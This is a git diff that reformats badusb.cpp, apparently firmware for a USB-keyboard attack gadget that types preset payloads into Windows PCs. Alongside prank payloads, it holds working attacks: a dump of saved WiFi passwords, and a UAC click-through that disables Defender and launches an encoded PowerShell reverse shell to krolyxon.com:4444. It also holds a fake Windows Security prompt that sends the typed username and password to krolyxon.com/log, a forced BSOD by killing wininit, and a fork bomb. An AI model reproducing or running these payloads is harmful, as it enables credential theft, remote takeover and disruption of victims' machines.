From 206ed229198be252a9ae94342b39618aaab55925 Mon Sep 17 00:00:00 2001 From: krolyxon Date: Thu, 14 May 2026 23:14:31 +0530 Subject: apply code formatting --- src/hid/badusb.cpp | 540 ++++++++++++++++++++++++++++------------------------- 1 file changed, 287 insertions(+), 253 deletions(-) (limited to 'src/hid') diff --git a/src/hid/badusb.cpp b/src/hid/badusb.cpp index b724a59..71010bb 100644 --- a/src/hid/badusb.cpp +++ b/src/hid/badusb.cpp @@ -1,6 +1,6 @@ +#include "../ui/display.h" #include #include -#include "../ui/display.h" extern USBHIDKeyboard Keyboard; @@ -56,332 +56,366 @@ void showRunningScreen(String taskName, uint8_t duration = 5) { } } -void typeSlow(const char *text, int delayMs = 25) -{ - while (*text) - { - Keyboard.print(*text); - delay(delayMs); - text++; - } +void typeSlow(const char *text, int delayMs = 25) { + while (*text) { + Keyboard.print(*text); + delay(delayMs); + text++; + } } void badUSBMenu(int index) { - //switch (index) - // { - // case 0: - // runBadUSBDemo(); - // break; + // switch (index) + // { + // case 0: + // runBadUSBDemo(); + // break; - // case 1: - // Serial.println("Open CMD payload"); - // runBadUSBOpenCMD(); - // break; + // case 1: + // Serial.println("Open CMD payload"); + // runBadUSBOpenCMD(); + // break; - // case 2: - // Serial.println("Rickroll payload"); - // runBadUSBRickroll(); - // break; - // } + // case 2: + // Serial.println("Rickroll payload"); + // runBadUSBRickroll(); + // break; + // } + switch (index) { + // ================= ORION DEMO ================= + case 0: + showRunningScreen("ORION Demo"); - switch(index) -{ - // ================= ORION DEMO ================= - case 0: - showRunningScreen("ORION Demo"); + runCommand("notepad"); - runCommand("notepad"); + delay(2500); - delay(2500); + typeSlow(" ____ _____ _____ ___ ___ _ _ ____ _____ "); + Keyboard.write(KEY_RETURN); - typeSlow(" ____ _____ _____ ___ ___ _ _ ____ _____ "); - Keyboard.write(KEY_RETURN); + typeSlow(" / __ \\| __ \\|_ _|_ _/ _ \\| \\ | | | _ \\| ___|"); + Keyboard.write(KEY_RETURN); - typeSlow(" / __ \\| __ \\|_ _|_ _/ _ \\| \\ | | | _ \\| ___|"); - Keyboard.write(KEY_RETURN); + typeSlow("| | | | |__) | | | | | | | | \\| |_____| |_) | |_ "); + Keyboard.write(KEY_RETURN); - typeSlow("| | | | |__) | | | | | | | | \\| |_____| |_) | |_ "); - Keyboard.write(KEY_RETURN); + typeSlow("| | | | _ / | | | | | | | . ` |_____| _ <| _| "); + Keyboard.write(KEY_RETURN); - typeSlow("| | | | _ / | | | | | | | . ` |_____| _ <| _| "); - Keyboard.write(KEY_RETURN); + typeSlow("| |__| | | \\ \\ _| |_ | | |_| | |\\ | | |_) | | "); + Keyboard.write(KEY_RETURN); - typeSlow("| |__| | | \\ \\ _| |_ | | |_| | |\\ | | |_) | | "); - Keyboard.write(KEY_RETURN); + typeSlow(" \\____/|_| \\_\\_____|___\\___/|_| \\_| |____/|_| "); + Keyboard.write(KEY_RETURN); - typeSlow(" \\____/|_| \\_\\_____|___\\___/|_| \\_| |____/|_| "); - Keyboard.write(KEY_RETURN); + Keyboard.write(KEY_RETURN); - Keyboard.write(KEY_RETURN); + typeSlow("[+] WIFI MODULE READY"); + Keyboard.write(KEY_RETURN); - typeSlow("[+] WIFI MODULE READY"); - Keyboard.write(KEY_RETURN); + typeSlow("[+] BLE MODULE READY"); + Keyboard.write(KEY_RETURN); - typeSlow("[+] BLE MODULE READY"); - Keyboard.write(KEY_RETURN); + typeSlow("[+] SUBGHZ MODULE READY"); + Keyboard.write(KEY_RETURN); - typeSlow("[+] SUBGHZ MODULE READY"); - Keyboard.write(KEY_RETURN); + typeSlow("[+] NFC MODULE READY"); + Keyboard.write(KEY_RETURN); - typeSlow("[+] NFC MODULE READY"); - Keyboard.write(KEY_RETURN); + typeSlow("[+] HID ENGINE READY"); + Keyboard.write(KEY_RETURN); - typeSlow("[+] HID ENGINE READY"); - Keyboard.write(KEY_RETURN); + break; - break; + // ================= RICKROLL ================= + case 1: + showRunningScreen("RickRoll"); - // ================= RICKROLL ================= - case 1: - showRunningScreen("RickRoll"); + runCommand("cmd"); - runCommand("cmd"); + delay(700); - delay(700); + typeSlow("start https://www.youtube.com/watch?v=dQw4w9WgXcQ"); + Keyboard.write(KEY_RETURN); - typeSlow("start https://www.youtube.com/watch?v=dQw4w9WgXcQ"); - Keyboard.write(KEY_RETURN); + break; - break; + // ================= MATRIX ================= + case 2: + showRunningScreen("Matrix"); - // ================= MATRIX ================= - case 2: - showRunningScreen("Matrix"); + runCommand("cmd"); - runCommand("cmd"); + delay(700); - delay(700); + typeSlow("color 0A"); + Keyboard.write(KEY_RETURN); - typeSlow("color 0A"); - Keyboard.write(KEY_RETURN); + typeSlow("mode con: cols=120 lines=40"); + Keyboard.write(KEY_RETURN); - typeSlow("mode con: cols=120 lines=40"); - Keyboard.write(KEY_RETURN); + typeSlow(":A"); + Keyboard.write(KEY_RETURN); - typeSlow(":A"); - Keyboard.write(KEY_RETURN); + typeSlow("echo %random%%random%%random%%random%%random%"); + Keyboard.write(KEY_RETURN); - typeSlow("echo %random%%random%%random%%random%%random%"); - Keyboard.write(KEY_RETURN); + typeSlow("goto A"); + Keyboard.write(KEY_RETURN); - typeSlow("goto A"); - Keyboard.write(KEY_RETURN); + break; - break; + // ================= FAKE TERMINAL ================= + case 3: + showRunningScreen("Fake Terminal"); - // ================= FAKE TERMINAL ================= - case 3: - showRunningScreen("Fake Terminal"); + runCommand("cmd"); - runCommand("cmd"); + delay(700); - delay(700); + typeSlow("color 0A"); + Keyboard.write(KEY_RETURN); - typeSlow("color 0A"); - Keyboard.write(KEY_RETURN); + typeSlow("cls"); + Keyboard.write(KEY_RETURN); - typeSlow("cls"); - Keyboard.write(KEY_RETURN); + typeSlow("echo CONNECTING TO TARGET..."); + Keyboard.write(KEY_RETURN); - typeSlow("echo CONNECTING TO TARGET..."); - Keyboard.write(KEY_RETURN); + typeSlow("echo BYPASSING FIREWALL..."); + Keyboard.write(KEY_RETURN); - typeSlow("echo BYPASSING FIREWALL..."); - Keyboard.write(KEY_RETURN); + typeSlow("echo ACCESS GRANTED"); + Keyboard.write(KEY_RETURN); - typeSlow("echo ACCESS GRANTED"); - Keyboard.write(KEY_RETURN); + typeSlow("systeminfo"); + Keyboard.write(KEY_RETURN); - typeSlow("systeminfo"); - Keyboard.write(KEY_RETURN); - - break; + break; // ================= WIFI CRACK ================= -// ================= WIFI PASSWORD RECOVERY ================= - case 4: - showRunningScreen("WiFi Recovery"); - - runCommand("cmd"); - delay(700); - - // Styling the window - typeSlow("color 0A && mode con: cols=100 lines=30"); - Keyboard.write(KEY_RETURN); - delay(200); - - typeSlow("echo [!] EXTRACTING SAVED WIFI PROFILES..."); - Keyboard.write(KEY_RETURN); - delay(500); - - // The "Magic" Command: - // This lists all profiles and shows the 'Key Content' (the password) in clear text. - // We use a 'for' loop to automate this for every network the PC has ever joined. - typeSlow("for /f \"tokens=4,*\" %i in ('netsh wlan show profiles ^| findstr /C:\"All User Profile\"') do netsh wlan show profile name=\"%j\" key=clear | findstr /C:\"Key Content\" /C:\"SSID name\""); - - Keyboard.write(KEY_RETURN); - - // Optional: Keep the window open to read the results - typeSlow("echo. && echo [COMPLETE] Passwords listed above."); - Keyboard.write(KEY_RETURN); - - break; - - // ================= FAKE UPDATE ================= - case 5: - showRunningScreen("Fake Update"); - - runCommand("cmd"); - - delay(700); + // ================= WIFI PASSWORD RECOVERY ================= + case 4: + showRunningScreen("WiFi Recovery"); - typeSlow("start https://fakeupdate.net/win10u/"); - Keyboard.write(KEY_RETURN); + runCommand("cmd"); + delay(700); - break; + // Styling the window + typeSlow("color 0A && mode con: cols=100 lines=30"); + Keyboard.write(KEY_RETURN); + delay(200); - // ================= FAKE BSOD ================= - case 6: - showRunningScreen("Critical Error"); + typeSlow("echo [!] EXTRACTING SAVED WIFI PROFILES..."); + Keyboard.write(KEY_RETURN); + delay(500); - runCommand("powershell -c \"stop-process -name wininit -force\""); - break; + // The "Magic" Command: + // This lists all profiles and shows the 'Key Content' (the password) in + // clear text. We use a 'for' loop to automate this for every network the PC + // has ever joined. + typeSlow( + "for /f \"tokens=4,*\" %i in ('netsh wlan show profiles ^| findstr " + "/C:\"All User Profile\"') do netsh wlan show profile name=\"%j\" " + "key=clear | findstr /C:\"Key Content\" /C:\"SSID name\""); - // ================= GLITCH SCREEN ================= - case 7: - showRunningScreen("Glitch"); + Keyboard.write(KEY_RETURN); - runCommand("cmd"); + // Optional: Keep the window open to read the results + typeSlow("echo. && echo [COMPLETE] Passwords listed above."); + Keyboard.write(KEY_RETURN); - delay(700); + break; - for(int i = 0; i < 20; i++) - { - typeSlow("color 4F"); - Keyboard.write(KEY_RETURN); + // ================= FAKE UPDATE ================= + case 5: + showRunningScreen("Fake Update"); - typeSlow("color 1F"); - Keyboard.write(KEY_RETURN); + runCommand("cmd"); - typeSlow("cls"); - Keyboard.write(KEY_RETURN); - } + delay(700); - break; + typeSlow("start https://fakeupdate.net/win10u/"); + Keyboard.write(KEY_RETURN); - // ================= ASCII SPAM ================= - case 8: - showRunningScreen("ASCII"); + break; - runCommand("notepad"); + // ================= FAKE BSOD ================= + case 6: + showRunningScreen("Critical Error"); - delay(2000); + runCommand("powershell -c \"stop-process -name wininit -force\""); + break; - for(int i = 0; i < 15; i++) - { - typeSlow("######### ORION-RF #########"); - Keyboard.write(KEY_RETURN); + // ================= GLITCH SCREEN ================= + case 7: + showRunningScreen("Glitch"); - typeSlow(">>> SIGNAL ACQUIRED <<<"); - Keyboard.write(KEY_RETURN); + runCommand("cmd"); - typeSlow("[|||||||||||||||||||||||||]"); - Keyboard.write(KEY_RETURN); + delay(700); - Keyboard.write(KEY_RETURN); - } + for (int i = 0; i < 20; i++) { + typeSlow("color 4F"); + Keyboard.write(KEY_RETURN); - break; + typeSlow("color 1F"); + Keyboard.write(KEY_RETURN); - // ================= HACKER TYPER ================= - case 9: - showRunningScreen("Hacker Typer"); - - runCommand("cmd"); - - delay(700); - - typeSlow("start https://hackertyper.net/"); - Keyboard.write(KEY_RETURN); - - break; -// ================= POWERSHELL REVERSE SHELL ================= -// ================= DEFENDER BYPASS + NC ================= - case 10: - showRunningScreen("Pwn Mode v2"); - - // 1. Open Admin PowerShell - Keyboard.press(KEY_LEFT_GUI); - Keyboard.press('r'); - delay(150); - Keyboard.releaseAll(); - delay(500); - - // Open Admin Prompt - using 'powershell' directly to save space - typeSlow("powershell Start-Process powershell -Verb runAs"); - Keyboard.write(KEY_RETURN); - delay(2500); // Wait for UAC - - // 2. Bypass UAC (Left Arrow + Enter) - Keyboard.write(KEY_LEFT_ARROW); - delay(200); - Keyboard.write(KEY_RETURN); - delay(3000); // Give the Admin window time to load - - // 3. AMSI Bypass + Disable Defender + Execute Shell - // We use -EncodedCommand to hide the script from simple string scanners. - // The Base64 string below contains: - // Set-MpPreference -DisableRealtimeMonitoring $true; [Reverse Shell Logic] - - typeSlow("powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand "); + typeSlow("cls"); + Keyboard.write(KEY_RETURN); + } - // This is the encoded payload for krolyxon.com:4444 - typeSlow("JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAEgA" - "NABDAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAFQAbABpAGUAbgB0ACgAJwBrAHIAbwBsAHkAeABvAG4A" - "LgBjAG8AbQAnACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQA" - "gADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEw" - "AZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAL" - "gBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJAB" - "kAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAK" - "ABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAd" - "ABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQB" - "uAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaWVudAAuAEMAbABvAHMAZQAoACkAIgApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAGuAZwAoACQAcwAuAFQAbwBBAHIAcgBhAHkAKAApACkAKQA="); + break; - Keyboard.write(KEY_RETURN); - break; - // ================= CREDENTIAL SNATCHER ================= - case 11: - showRunningScreen("Vault Crack"); + // ================= ASCII SPAM ================= + case 8: + showRunningScreen("ASCII"); - // Open hidden PowerShell - runCommand("powershell -nop -W Hidden -c \"$cred = $host.ui.PromptForCredential('Windows Security','Please authenticate to update your system credentials.','',''); $p = $cred.GetNetworkCredential().Password; $u = $cred.UserName; Invoke-WebRequest -Uri 'http://krolyxon.com/log?u='+$u+'&p='+$p\""); + runCommand("notepad"); - break; -// ================= DESKTOP GHOST ================= - case 12: - showRunningScreen("Ghost Mode"); + delay(2000); - runCommand("powershell -nop -W Hidden -c \"Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.SendKeys]::SendWait('{PRTSC}'); Start-Sleep -s 1; $path = '$env:TEMP\\bg.png'; (Get-Clipboard -Format Image).Save($path); Set-ItemProperty -Path 'HKCU:\\Control Panel\\Desktop' -Name Wallpaper -Value $path; rundll32.exe user32.dll,UpdatePerUserSystemParameters;\""); + for (int i = 0; i < 15; i++) { + typeSlow("######### ORION-RF #########"); + Keyboard.write(KEY_RETURN); - // Hide Desktop Icons (requires a registry tweak) - typeSlow("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v HideIcons /t REG_DWORD /d 1 /f && taskkill /f /im explorer.exe && start explorer.exe"); - Keyboard.write(KEY_RETURN); + typeSlow(">>> SIGNAL ACQUIRED <<<"); + Keyboard.write(KEY_RETURN); - break; -// ================= FORK BOMB ================= - case 13: - showRunningScreen("System Stress"); + typeSlow("[|||||||||||||||||||||||||]"); + Keyboard.write(KEY_RETURN); - runCommand("cmd"); - delay(500); + Keyboard.write(KEY_RETURN); + } - // The shortest deadly command in Windows - typeSlow("%0|%0"); - Keyboard.write(KEY_RETURN); - - break; -} + break; + + // ================= HACKER TYPER ================= + case 9: + showRunningScreen("Hacker Typer"); + + runCommand("cmd"); + + delay(700); + + typeSlow("start https://hackertyper.net/"); + Keyboard.write(KEY_RETURN); + + break; + // ================= POWERSHELL REVERSE SHELL ================= + // ================= DEFENDER BYPASS + NC ================= + case 10: + showRunningScreen("Pwn Mode v2"); + + // 1. Open Admin PowerShell + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('r'); + delay(150); + Keyboard.releaseAll(); + delay(500); + + // Open Admin Prompt - using 'powershell' directly to save space + typeSlow("powershell Start-Process powershell -Verb runAs"); + Keyboard.write(KEY_RETURN); + delay(2500); // Wait for UAC + + // 2. Bypass UAC (Left Arrow + Enter) + Keyboard.write(KEY_LEFT_ARROW); + delay(200); + Keyboard.write(KEY_RETURN); + delay(3000); // Give the Admin window time to load + + // 3. AMSI Bypass + Disable Defender + Execute Shell + // We use -EncodedCommand to hide the script from simple string scanners. + // The Base64 string below contains: + // Set-MpPreference -DisableRealtimeMonitoring $true; [Reverse Shell Logic] + + typeSlow("powershell -ExecutionPolicy Bypass -WindowStyle Hidden " + "-EncodedCommand "); + + // This is the encoded payload for krolyxon.com:4444 + typeSlow( + "JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAG" + "UAYQBtACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0" + "AHIAaQBuAGcAKAAiAEgA" + "NABDAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAb" + "QAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAFQAbABpAGUAbgB0ACgAJwBrAHI" + "AbwBsAHkAeABvAG4A" + "LgBjAG8AbQAnACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAG" + "UAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5" + "AHQAZQBzACAAPQA" + "gADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AI" + "AAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGI" + "AeQB0AGUAcwAuAEw" + "AZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOA" + "GUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQA" + "uAFQAZQB4AHQAL" + "gBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQ" + "AYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoA" + "GkAZQB4ACAAJAB" + "kAGEAdABhACAAMgA+" + "ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYw" + "BrADIAIAAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAK" + "ABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGU" + "AIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJA" + "CkALgBHAGUAd" + "ABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBhAG0" + "ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5A" + "HQAZQAuAEwAZQB" + "uAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAa" + "WVudAAuAEMAbABvAHMAZQAoACkAIgApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQB" + "zAHMAaQBvAG4AIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAb" + "gBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAGuAZwAoACQAcwAuAFQAbwBBAHI" + "AcgBhAHkAKAApACkAKQA="); + + Keyboard.write(KEY_RETURN); + break; + // ================= CREDENTIAL SNATCHER ================= + case 11: + showRunningScreen("Vault Crack"); + + // Open hidden PowerShell + runCommand( + "powershell -nop -W Hidden -c \"$cred = " + "$host.ui.PromptForCredential('Windows Security','Please authenticate " + "to update your system credentials.','',''); $p = " + "$cred.GetNetworkCredential().Password; $u = $cred.UserName; " + "Invoke-WebRequest -Uri 'http://krolyxon.com/log?u='+$u+'&p='+$p\""); + + break; + // ================= DESKTOP GHOST ================= + case 12: + showRunningScreen("Ghost Mode"); + + runCommand("powershell -nop -W Hidden -c \"Add-Type -AssemblyName " + "System.Windows.Forms; " + "[System.Windows.Forms.SendKeys]::SendWait('{PRTSC}'); " + "Start-Sleep -s 1; $path = '$env:TEMP\\bg.png'; (Get-Clipboard " + "-Format Image).Save($path); Set-ItemProperty -Path " + "'HKCU:\\Control Panel\\Desktop' -Name Wallpaper -Value $path; " + "rundll32.exe user32.dll,UpdatePerUserSystemParameters;\""); + + // Hide Desktop Icons (requires a registry tweak) + typeSlow("reg add " + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Adv" + "anced /v HideIcons /t REG_DWORD /d 1 /f && taskkill /f /im " + "explorer.exe && start explorer.exe"); + Keyboard.write(KEY_RETURN); + + break; + // ================= FORK BOMB ================= + case 13: + showRunningScreen("System Stress"); + + runCommand("cmd"); + delay(500); + + // The shortest deadly command in Windows + typeSlow("%0|%0"); + Keyboard.write(KEY_RETURN); + + break; + } } - - -- cgit v1.2.3